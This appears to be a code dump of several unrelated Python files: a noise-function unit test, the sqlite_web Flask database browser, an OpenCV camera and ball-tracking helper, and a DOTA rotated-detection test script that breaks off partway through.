Y,wvar = p.add_noise(Y0)
self.assertEqual( np.iscomplexobj(Y) , cpx )
snr_obs = -20*np.log10( la.norm(Y-Y0)/la.norm(Y0))
self.assertTrue( abs(snr-snr_obs) < 1.0, 'gross error in add_noise')
wvar_obs = la.norm(Y0-Y)**2/Y.size
self.assertTrue( .5 < wvar_obs/wvar < 1.5, 'gross error in add_noise wvar')
def test_awgn_cpx(self):
self._test_awgn(True)
def test_awgn_real(self):
self._test_awgn(False)
unittest.main(verbosity=2)
#exec(open(os.environ['PYTHONSTARTUP']).read(),globals(),globals())
|
sqlite_web.py
|
#!/usr/bin/env python
import datetime
import hashlib
import math
import operator
import optparse
import os
import re
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
from io import TextIOWrapper
# Py2k compat.
if sys.version_info[0] == 2:
PY2 = True
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
else:
PY2 = False
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version < (3, 0, 0):
raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
'Please update by running pip install --update '
'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import sqlite3
from playhouse.dataset import DataSet
from playhouse.migrate import migrate
from playhouse.sqlite_ext import SqliteExtDatabase
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
app = Flask(
__name__,
static_folder=os.path.join(CUR_DIR, 'static'),
template_folder=os.path.join(CUR_DIR, 'templates'))
app.config.from_object(__name__)
dataset = None
migrator = None
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
db_file = dataset._database.database
if db_file.startswith('file:'):
db_file = db_file[5:]
return os.path.realpath(db_file.rsplit('?', 1)[0])
@property
def is_readonly(self):
db_file = dataset._database.database
return db_file.endswith('?mode=ro')
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html', sqlite=sqlite3)
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
if request.form.get('password') == app.config['PASSWORD']:
session['authorized'] = True
return redirect(session.get('next_url') or url_for('index'))
flash('The password you entered is incorrect.', 'danger')
return render_template('login.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
@app.route('/create-table/', methods=['POST'])
def table_create():
table = (request.form.get('table_name') or '').strip()
if not table:
flash('Table name is required.', 'danger')
return redirect(request.form.get('redirect') or url_for('index'))
dataset[table]
return redirect(url_for('table_import', table=table))
@app.route('/<table>/')
@require_table
def table_structure(table):
ds_table = dataset[table]
model_class = ds_table.model_class
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_structure.html',
columns=dataset.get_columns(table),
ds_table=ds_table,
foreign_keys=dataset.get_foreign_keys(table),
indexes=dataset.get_indexes(table),
model_class=model_class,
table=table,
table_sql=table_sql,
triggers=dataset.get_triggers(table))
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/<table>/add-column/', methods=['GET', 'POST'])
@require_table
def add_column(table):
column_mapping = OrderedDict((
('VARCHAR', CharField),
('TEXT', TextField),
('INTEGER', IntegerField),
('REAL', FloatField),
('BOOL', BooleanField),
('BLOB', BlobField),
('DATETIME', DateTimeField),
('DATE', DateField),
('TIME', TimeField),
('DECIMAL', DecimalField)))
request_data = get_request_data()
col_type = request_data.get('type')
name = request_data.get('name', '')
if request.method == 'POST':
if name and col_type in column_mapping:
migrate(
migrator.add_column(
table,
name,
column_mapping[col_type](null=True)))
flash('Column "%s" was added successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name and column type are required.', 'danger')
return render_template(
'add_column.html',
col_type=col_type,
column_mapping=column_mapping,
name=name,
table=table)
@app.route('/<table>/drop-column/', methods=['GET', 'POST'])
@require_table
def drop_column(table):
request_data = get_request_data()
name = request_data.get('name', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if name in column_names:
migrate(migrator.drop_column(table, name))
flash('Column "%s" was dropped successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name is required.', 'danger')
return render_template(
'drop_column.html',
columns=columns,
column_names=column_names,
name=name,
table=table)
@app.route('/<table>/rename-column/', methods=['GET', 'POST'])
@require_table
def rename_column(table):
request_data = get_request_data()
rename = request_data.get('rename', '')
rename_to = request_data.get('rename_to', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if (rename in column_names) and (rename_to not in column_names):
migrate(migrator.rename_column(table, rename, rename_to))
flash('Column "%s" was renamed successfully!' % rename, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Column name is required and cannot conflict with an '
'existing column\'s name.', 'danger')
return render_template(
'rename_column.html',
columns=columns,
column_names=column_names,
rename=rename,
rename_to=rename_to,
table=table)
@app.route('/<table>/add-index/', methods=['GET', 'POST'])
@require_table
def add_index(table):
request_data = get_request_data()
indexed_columns = request_data.getlist('indexed_columns')
unique = bool(request_data.get('unique'))
columns = dataset.get_columns(table)
if request.method == 'POST':
if indexed_columns:
migrate(
migrator.add_index(
table,
indexed_columns,
unique))
flash('Index created successfully.', 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('One or more columns must be selected.', 'danger')
return render_template(
'add_index.html',
columns=columns,
indexed_columns=indexed_columns,
table=table,
unique=unique)
@app.route('/<table>/drop-index/', methods=['GET', 'POST'])
@require_table
def drop_index(table):
request_data = get_request_data()
name = request_data.get('name', '')
indexes = dataset.get_indexes(table)
index_names = [index.name for index in indexes]
if request.method == 'POST':
if name in index_names:
migrate(migrator.drop_index(table, name))
flash('Index "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Index name is required.', 'danger')
return render_template(
'drop_index.html',
indexes=indexes,
index_names=index_names,
name=name,
table=table)
@app.route('/<table>/drop-trigger/', methods=['GET', 'POST'])
@require_table
def drop_trigger(table):
request_data = get_request_data()
name = request_data.get('name', '')
triggers = dataset.get_triggers(table)
trigger_names = [trigger.name for trigger in triggers]
if request.method == 'POST':
if name in trigger_names:
dataset.query('DROP TRIGGER "%s";' % name)
flash('Trigger "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Trigger name is required.', 'danger')
return render_template(
'drop_trigger.html',
triggers=triggers,
trigger_names=trigger_names,
name=name,
table=table)
@app.route('/<table>/content/')
@require_table
def table_content(table):
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
total_rows = ds_table.all().count()
rows_per_page = app.config['ROWS_PER_PAGE']
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = ds_table.all().paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_content.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
table=table,
total_pages=total_pages,
total_rows=total_rows)
@app.route('/<table>/query/', methods=['GET', 'POST'])
@require_table
def table_query(table):
data = []
data_description = error = row_count = sql = None
if request.method == 'POST':
sql = request.form['sql']
if 'export_json' in request.form:
return export(table, sql, 'json')
elif 'export_csv' in request.form:
return export(table, sql, 'csv')
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
if request.args.get('sql'):
sql = request.args.get('sql')
else:
sql = 'SELECT *\nFROM "%s"' % (table)
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_query.html',
data=data,
data_description=data_description,
error=error,
query_images=get_query_images(),
row_count=row_count,
sql=sql,
table=table,
table_sql=table_sql)
@app.route('/table-definition/', methods=['POST'])
def set_table_definition_preference():
key = 'show'
show = False
if request.form.get(key) and request.form.get(key) != 'false':
session[key] = show = True
elif key in session:
del session[key]
return jsonify({key: show})
def export(table, sql, export_format):
model_class = dataset[table].model_class
query = model_class.raw(sql).dicts()
buf = StringIO()
if export_format == 'json':
kwargs = {'indent': 2}
filename = '%s-export.json' % table
mimetype = 'text/javascript'
else:
kwargs = {}
filename = '%s-export.csv' % table
mimetype = 'text/csv'
dataset.freeze(query, export_format, file_obj=buf, **kwargs)
response_data = buf.getvalue()
response = make_response(response_data)
response.headers['Content-Length'] = len(response_data)
response.headers['Content-Type'] = mimetype
response.headers['Content-Disposition'] = 'attachment; filename=%s' % (
filename)
response.headers['Expires'] = 0
response.headers['Pragma'] = 'public'
return response
@app.route('/<table>/import/', methods=['GET', 'POST'])
@require_table
def table_import(table):
count = None
request_data = get_request_data()
strict = bool(request_data.get('strict'))
if request.method == 'POST':
file_obj = request.files.get('file')
if not file_obj:
flash('Please select an import file.', 'danger')
elif not file_obj.filename.lower().endswith(('.csv', '.json')):
flash('Unsupported file-type. Must be a .json or .csv file.',
'danger')
else:
if file_obj.filename.lower().endswith('.json'):
format = 'json'
else:
format = 'csv'
# Here we need to translate the file stream. Werkzeug uses a
# spooled temporary file opened in wb+ mode, which is not
# compatible with Python's CSV module. We'd need to reach pretty
# far into Flask's internals to modify this behavior, so instead
# we'll just translate the stream into utf8-decoded unicode.
if not PY2:
try:
stream = TextIOWrapper(file_obj, encoding='utf8')
except AttributeError:
# The SpooledTemporaryFile used by werkzeug does not
# implement an API that the TextIOWrapper expects, so we'll
# just consume the whole damn thing and decode it.
# Fixed in werkzeug 0.15.
stream = StringIO(file_obj.read().decode('utf8'))
else:
stream = file_obj.stream
try:
with dataset.transaction():
count = dataset.thaw(
table,
format=format,
file_obj=stream,
strict=strict)
except Exception as exc:
flash('Error importing file: %s' % exc, 'danger')
else:
flash(
'Successfully imported %s objects from %s.' % (
count, file_obj.filename),
'success')
return redirect(url_for('table_content', table=table))
return render_template(
'table_import.html',
count=count,
strict=strict,
table=table)
@app.route('/<table>/drop/', methods=['GET', 'POST'])
@require_table
def drop_table(table):
if request.method == 'POST':
model_class = dataset[table].model_class
model_class.drop_table()
dataset.update_cache() # Update all tables.
flash('Table "%s" dropped successfully.' % table, 'success')
return redirect(url_for('index'))
return render_template('drop_table.html', table=table)
@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50):
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
column_re = re.compile('(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
except:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': bool(app.config.get('PASSWORD')),
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
class PrefixMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = '/%s' % prefix.strip('/')
self.prefix_len = len(self.prefix)
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][self.prefix_len:]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
start_response('404', [('Content-Type', 'text/plain')])
return ['URL does not match application prefix.'.encode()]
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=8080,
help='Port for web interface, default=8080',
type='int')
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
help='Host for web interface, default=127.0.0.1')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
parser.add_option(
'-x',
'--no-browser',
action='store_false',
default=True,
dest='browser',
help='Do not automatically open browser page.')
parser.add_option(
'-P',
'--password',
action='store_true',
dest='prompt_password',
help='Prompt for password to access database browser.')
parser.add_option(
'-r',
'--read-only',
action='store_true',
dest='read_only',
help='Open database in read-only mode.')
parser.add_option(
'-u',
'--url-prefix',
dest='url_prefix',
help='URL prefix for application.')
ssl_opts = optparse.OptionGroup(parser, 'SSL options')
ssl_opts.add_option(
'-c',
'--ssl-cert',
dest='ssl_cert',
help='SSL certificate file path.')
ssl_opts.add_option(
'-k',
'--ssl-key',
dest='ssl_key',
help='SSL private key file path.')
ssl_opts.add_option(
'-a',
'--ad-hoc',
action='store_true',
dest='ssl_ad_hoc',
help='Use ad-hoc SSL context.')
parser.add_option_group(ssl_opts)
return parser
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
def install_auth_handler(password):
app.config['PASSWORD'] = password
@app.before_request
def check_password():
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('You must log-in to view the database browser.', 'danger')
session['next_url'] = request.base_url
return redirect(url_for('login'))
def initialize_app(filename, read_only=False, password=None, url_prefix=None):
global dataset
global migrator
if password:
install_auth_handler(password)
if read_only:
if sys.version_info < (3, 4, 0):
die('Python 3.4.0 or newer is required for read-only access.')
if peewee_version < (3, 5, 1):
die('Peewee 3.5.1 or newer is required for read-only access.')
db = SqliteDatabase('file:%s?mode=ro' % filename, uri=True)
try:
db.connect()
except OperationalError:
die('Unable to open database file in read-only mode. Ensure that '
'the database exists in order to use read-only mode.')
db.close()
dataset = SqliteDataSet(db, bare_fields=True)
else:
dataset = SqliteDataSet('sqlite:///%s' % filename, bare_fields=True)
if url_prefix:
app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix=url_prefix)
migrator = dataset._migrator
dataset.close()
def main():
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not args:
die('Error: missing required path to database file.')
password = None
if options.prompt_password:
if os.environ.get('SQLITE_WEB_PASSWORD'):
password = os.environ['SQLITE_WEB_PASSWORD']
else:
while True:
password = getpass('Enter password: ')
password_confirm = getpass('Confirm password: ')
if password != password_confirm:
print('Passwords did not match!')
else:
break
# Initialize the dataset instance and (optionally) authentication handler.
initialize_app(args[0], options.read_only, password, options.url_prefix)
if options.browser:
open_browser_tab(options.host, options.port)
if password:
key = b'sqlite-web-' + args[0].encode('utf8') + password.encode('utf8')
app.secret_key = hashlib.sha256(key).hexdigest()
# Set up SSL context, if specified.
kwargs = {}
if options.ssl_ad_hoc:
kwargs['ssl_context'] = 'adhoc'
if options.ssl_cert and options.ssl_key:
if not os.path.exists(options.ssl_cert) or not os.path.exists(options.ssl_key):
die('ssl cert or ssl key not found. Please check the file-paths.')
kwargs['ssl_context'] = (options.ssl_cert, options.ssl_key)
elif options.ssl_cert:
die('ssl key "-k" is required alongside the ssl cert')
elif options.ssl_key:
die('ssl cert "-c" is required alongside the ssl key')
# Run WSGI application.
app.run(host=options.host, port=options.port, debug=options.debug, **kwargs)
if __name__ == '__main__':
main()
|
camera.py
|
from threading import Thread
import cv2
from balltrack import track_tennis_ball
delay = 30
class Camera:
def __init__(self, id=0, height=720, width=1280, fps=30):
self.cap = cv2.VideoCapture(id)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
w = self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)
h = self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
print(w,h)
self.success, self.image = self.cap.read()
self.stopped = False
def update(self):
while True:
if self.stopped:
return
self.success, image = self.cap.read()
self.image = image#[180:900, 320:1600]
def start(self):
Thread(target=self.update, args=()).start()
def read_rgb(self):
image = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)
return self.success, image
def release(self):
self.stopped = True
self.cap.release()
def get_jpg(self):
return cv2.imencode('.jpg', self.image)[1].tostring()
class TrackingCameraRunner():
def __init__(self, camera=0):
self.tracker = cv2.TrackerKCF_create()
self.tracking = False
self.camera = Camera(camera)
self.camera.start()
self.frame = None
#self.faces = Faces()
self.im = None
def close(self):
self.camera.release()
cv2.destroyAllWindows()
def track_tennis_ball(self):
center, radius = track_tennis_ball(self.frame)
if center is not None:
cv2.circle(self.frame, (int(center[0]), int(center[1])), int(radius),
(0, 255, 255), 2)
cv2.circle(self.frame, center, 5, (0, 0, 255), -1)
return center, radius
def step_frame(self):
ret, frame = self.camera.read_rgb()
if ret is True:
self.frame = frame
def get_jpg(self):
return cv2.imencode('.jpg', cv2.cvtColor(self.frame, cv2.COLOR_RGB2BGR))[1].tostring()
|
test_dota_r3det.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from data.io.image_preprocess import short_side_resize_for_inference_data
from libs.networks import build_whole_network_r3det
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.coordinate_convert import forward_convert, backward_convert
from libs.box_utils import nms_rotate
from libs.box_utils.rotate_polygon_nms import rotate_gpu_nms
def worker(gpu_id, images, det_net, args, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
img_batch = short_side_resize_for_inference_data(img_tensor=img_batch,
target_shortside_len=cfgs.IMG_SHORT_SIDE_LEN,
length_limitation=cfgs.IMG_MAX_LENGTH)
if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch_h=None,
gtboxes_batch_r=None)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
# if 'P0016' not in img_path:
# continue
img = cv2.imread(img_path)
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
if imgH < args.h_len:
temp = np.zeros([args.h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = args.h_len
if imgW < args.w_len:
temp = np.zeros([imgH, args.w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = args.w_len
for hh in range(0, imgH, args.h_len - args.h_overlap):
if imgH - hh - 1 < args.h_len:
hh_ = imgH - args.h_len
else:
hh_ = hh
for ww in range(0, imgW, args.w_len - args.w_overlap):
if imgW - ww - 1 < args.w_len:
ww_ = imgW - args.w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + args.h_len), ww_:(ww_ + args.w_len), :]
resized_img, det_boxes_r_, det_scores_r_, det_category_r_ = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: src_img[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
det_boxes_r_ = backward_convert(det_boxes_r_, False)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0] = box_rotate[0] + ww_
box_rotate[1] = box_rotate[1] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.05, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3}
for sub_class in range(1, cfgs.CLASS_NUM + 1):
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_boxes_r = np.array(tmp_boxes_r)
tmp = np.zeros([tmp_boxes_r.shape[0], tmp_boxes_r.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r
tmp[:, -1] = np.array(tmp_score_r)
try:
inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r),
scores=np.array(tmp_score_r),
iou_threshold=threshold[LABEL_NAME_MAP[sub_class]],
max_output_size=500)
except:
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r.shape[0], tmp_boxes_r.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[LABEL_NAME_MAP[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(det_net, real_test_img_list, args, txt_name):
save_path = os.path.join('./test_dota', cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, args, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.mkdir(os.path.join(save_path, 'dota_img_vis'))
draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_indices = res['scores'] >= cfgs.VIS_SCORE
detected_scores = res['scores'][detected_indices]
detected_boxes = res['boxes'][detected_indices]
detected_categories = res['labels'][detected_indices]
final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
CLASS_DOTA = NAME_LABEL_MAP.keys()
write_handle = {}
tools.mkdir(os.path.join(save_path, 'dota_res'))
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
rboxes = forward_convert(res['boxes'], with_label=False)
for i, rbox in enumerate(rboxes):
command = '%s %.3f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
res['scores'][i],
rbox[0], rbox[1], rbox[2], rbox[3],
rbox[4], rbox[5], rbox[6], rbox[7],)
write_handle[LABEL_NAME_MAP[res['labels'][i]]].write(command)
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class].close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def eval(num_imgs, args):
txt_name = '{}.txt'.format(cfgs.VERSION)
if not args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************'*3)
print('Already tested imgs:', img_filter)
print('****************************'*3)
fr.close()
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
